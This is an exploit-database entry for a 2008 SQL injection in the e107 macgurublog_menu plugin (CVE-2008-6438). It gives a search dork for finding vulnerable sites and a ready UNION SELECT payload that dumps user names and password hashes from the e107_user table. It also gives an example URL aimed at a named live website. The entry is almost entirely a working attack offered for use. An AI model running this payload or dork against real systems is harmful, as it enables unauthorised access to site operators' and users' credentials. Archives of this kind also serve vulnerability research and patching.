e107 Plugin BLOG Engine 2.1.4 - SQL Injection

Author: ZoRLu
type: webapps
platform: php
port: 
date_added: 2008-10-27  
date_updated:   
verified: 1  
codes: OSVDB-51408;CVE-2008-6438  
tags:   
aliases:   
screenshot_url:   
application_url:   

raw file: 6856.txt  
e107 Plugin macgurublog_menu macgurublog.php (uid) Remote Sql inj

author: ZoRLu

home: z0rlu.blogspot.com

concat: trt-turk@hotmail.com

date: 28/10/2008

n0te: YALNIZLIK YiTiRDi ANLAMINI YALNIZLIGIMDA  : ( (

n0te: a.q kpss : ) )

dork: allinurl:"macgurublog.php?uid="

exploit:

http://localhost/script_path/macgurublog.php?uid=[SQL]

[SQL]=

-1+union+select+concat(user_name,char(58),user_password,char(58)),2+from+e107_user/*

example:

http://www.dmchat.org.uk/e107_plugins/macgurublog_menu/macgurublog.php?uid=-1+union+select+concat(user_name,char(58),user_password,char(58)),2+from+e107_user/*

thanks: str0ke

# milw0rm.com [2008-10-28]